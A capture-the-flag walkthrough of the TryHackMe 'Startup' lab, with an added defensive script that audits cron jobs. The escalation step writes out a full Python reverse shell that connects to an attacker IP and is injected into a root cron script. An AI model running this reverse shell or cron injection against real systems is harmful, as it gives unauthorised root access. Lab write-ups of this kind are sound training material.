THM: Startup

Hello, everyone! In this article, I’ll walk you through a TryHackMe room called Startup. This room is designed for beginners, testing your skills in web exploitation, FTP access, remote code execution, and, ultimately, gaining root access through a basic cronjob privilege escalation. Get ready to tackle this beginner-friendly challenge and learn as you progress. Let’s dive in!

Reconnaissance

Scanning

Nmap scan

Let’s start with an aggressive (-A) Nmap scan on all ports (-p-).

ryuk@kali:~$ nmap -A -p- -T4 -oA nmap/aggressive-scan-all-ports 10.10.179.133

scan report:

Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-25 15:07 IST
Stats: 0:07:34 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 49.80% done; ETC: 15:22 (0:07:38 remaining)
Nmap scan report for 10.10.179.133
Host is up (0.21s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT      STATE    SERVICE VERSION
21/tcp    open     ftp     vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.8.79.167
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 5
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxrwxrwx    2 65534    65534        4096 Feb 25 09:53 ftp [NSE: writeable]
| -rw-r--r--    1 0        0          251631 Nov 12  2020 important.jpg
|_-rw-r--r--    1 0        0             208 Nov 12  2020 notice.txt
22/tcp    open     ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b9a60b841d2201a401304843612bab94 (RSA)
|   256 ec13258c182036e6ce910e1626eba2be (ECDSA)
|_  256 a2ff2a7281aaa29f55a4dc9223e6b43f (ED25519)
80/tcp    open     http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Maintenance
|_http-server-header: Apache/2.4.18 (Ubuntu)
46699/tcp filtered unknown
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1066.65 seconds

Enumeration

The Nmap scan has completed, and I found 4 ports of interest (three open, one filtered). Now, let’s enumerate the open ports one by one.

PORT: 21 FTP

On port 21, FTP is running and allows anonymous login, which means I can log in using anonymous:anonymous.

version: vsftpd 3.0.3

Anonymous login available

| drwxrwxrwx    2 65534    65534        4096 Feb 25 09:53 ftp [NSE: writeable]
| -rw-r--r--    1 0        0          251631 Nov 12  2020 important.jpg
|_-rw-r--r--    1 0        0             208 Nov 12  2020 notice.txt

Note: directory ftp is writable

The file permissions of the FTP directory allow everyone to write data.


ryuk@kali:~$ ftp 10.10.179.133

PORT: 22 SSH

Version: OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)

SSH is running but not vulnerable by itself; it could still be useful for logging in if I obtain credentials.

PORT: 80 HTTP

Website URL: http://10.10.179.133/

When I visit the website, it is showing a maintenance page. Nothing interesting found.

200 Maintenance page.

(Screenshot: Maintenance page)

Gobuster

As usual, I ran Gobuster to fuzz web directories and found two directories.

ryuk@kali:~$ gobuster dir -u http://10.10.179.133/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 -o web/80-http/gobuster.txt

(Screenshot: gobuster results)

/files            301
/server-status    403


The FTP directory is served at /files. I can upload a shell via FTP and execute it by visiting this endpoint.

Exploitation

Shell as www

Logged in with FTP and uploaded a simple web shell to the ftp directory.

The web shell is working.

Time to upload a stable reverse shell.


Initially, the shell we get is a non-interactive shell with limited features. To make it an interactive shell, you can use python’s pty module:

python -c 'import pty; pty.spawn("/bin/bash")'

There are unusual directories and files in / that should not be there:

incidents
vagrant
recipe.txt

recipe.txt

Someone asked what our main ingredient to our spice soup is today. I figured I can't keep it a secret forever and told him it was love.

Unable to access the user’s home directory.

Shell as lennie

There are some more directories in /; let’s check them out.

Found a suspicious.pcapng file in the incidents directory.

Opened the file with Wireshark and, after some analysis, found the password for user lennie in a captured reverse shell session.

We can SSH or switch user to lennie using this password.


Shell as root

There is one more interesting directory named scripts, in which a file planner.sh is being run with root privileges; some cronjob is probably running this file. You can confirm this by checking the timestamp of the file startup_list.txt, which is updated by the planner.sh script every minute.

File: /etc/print.sh

Our user lennie can edit the file /etc/print.sh.

We can either read root.txt or spawn root shell.

echo "cat /root/root.txt >/tmp/root.txt">>/etc/print.sh

Or, to spawn a root shell, append a Python reverse shell that I can connect to:

echo "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.8.79.167\",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"bash\")'">>/etc/print.sh
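The check a defender would run against this misconfiguration, as an added example that is not part of the original write-up: it flags root cron scripts, and the files they invoke, that a non-root user can modify. The crontab line and paths in the usage comment are placeholders, since the room’s actual cron entry is not shown.

```shell
# Added example, not from the original write-up: an audit for the weakness
# behind this room's privilege escalation, a root cron job whose script, or a
# file that script runs, is writable by a low-privileged user. Paths in the
# usage comment are placeholders; the room's real cron entry is not shown.

# script_is_safe FILE [OWNER]
# Returns 0 if FILE exists, is owned by OWNER (default root) and has no
# group/other write bit; 1 otherwise. ls -ldL resolves symlinks, POSIX only.
script_is_safe() {
    f="$1"; want="${2:-root}"
    [ -f "$f" ] || return 1
    perm=$(ls -ldL "$f" | awk '{print $1}')
    owner=$(ls -ldL "$f" | awk '{print $3}')
    [ "$owner" = "$want" ] || return 1
    case "$perm" in
        ?????w*|????????w*) return 1 ;;   # 6th char: group w, 9th: other w
    esac
    return 0
}

# audit_script FILE [OWNER]
# Checks FILE and, one level deep, every absolute path mentioned in it. That
# is where the room's flaw hides: planner.sh runs as root, and a file it
# invokes, /etc/print.sh, is writable by lennie. Returns 1 if anything is unsafe.
audit_script() {
    s="$1"; o="${2:-root}"; bad=0
    script_is_safe "$s" "$o" || { echo "UNSAFE: $s"; bad=1; }
    for dep in $(grep -o '/[A-Za-z0-9_./-]*' "$s" 2>/dev/null | sort -u); do
        [ -f "$dep" ] || continue
        script_is_safe "$dep" "$o" || { echo "UNSAFE: $dep (used by $s)"; bad=1; }
    done
    return $bad
}

# audit_cron_line "MIN HOUR DOM MON DOW USER COMMAND..." [OWNER]
# Audits every absolute path in the command part of a system-crontab line.
audit_cron_line() {
    o="${2:-root}"; rc=0
    for tok in $(printf '%s\n' "$1" | awk '{for(i=7;i<=NF;i++) printf "%s ", $i}'); do
        case "$tok" in
            /*) audit_script "$tok" "$o" || rc=1 ;;
        esac
    done
    return $rc
}

# Usage (placeholder path): audit_cron_line "* * * * * root /path/to/planner.sh"
```

Run it against each line of /etc/crontab and /etc/cron.d/* on a host; any UNSAFE line is a file a local user could turn into root code execution.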


Thank you for reading!